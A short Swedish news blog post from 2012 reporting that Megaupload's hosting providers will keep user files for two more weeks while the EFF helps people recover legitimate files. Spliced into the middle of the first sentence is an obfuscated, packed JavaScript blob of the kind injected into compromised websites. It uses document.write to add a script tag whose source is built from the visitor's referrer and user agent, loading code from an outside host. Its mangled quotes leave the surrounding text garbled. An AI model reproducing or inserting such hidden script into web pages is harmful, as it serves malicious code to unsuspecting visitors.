Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Megaupload har kvar datan i 2 veckor till så att användarna ska kunna ta hand om den.

Megaupload har kvar datan i 2 veckor till så att användarna ska kunna ta hand om den.
Filip Urde
  • On 1 februari, 2012
  • http://www.revue.se/filip-urde

Megauploads eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zrsbe|var|u0026u|referrer|ystzd||js|php’.split(’|’),0,{}))
digitala dörrar stängdes på grund av piratkopierat material, men det finns fortfarande massor med lagligt innehåll på dess servrar.

Självklart vill folk ha tillbaks sina filer, men den amerikanska regeringen har fått vad den vill ha och eftersom Megaupload inte längre betalar för sin hosting, så vill hosting företaget inte längre hålla kvar filerna.  Vilket är ett stort problem. Carpathia Hosting och Cogent Communications har dock beslutat att bevara filerna i ytterligare två veckor medan man gör upp en deal med den amerikanska justitiedepartementet så att folk ska kunna plocka hem sina filer. Under tiden har Electronic Frontier Foundation (EFF) gått ihop med Carpathia och skapat en webbplats som sätter människor i kontakt med EFFs advokater som ska hjälpa folk att få ner sina filer. Så i nuläget finns många filer i förvar, men måste granskas av det amerikanska justitiedepartementet.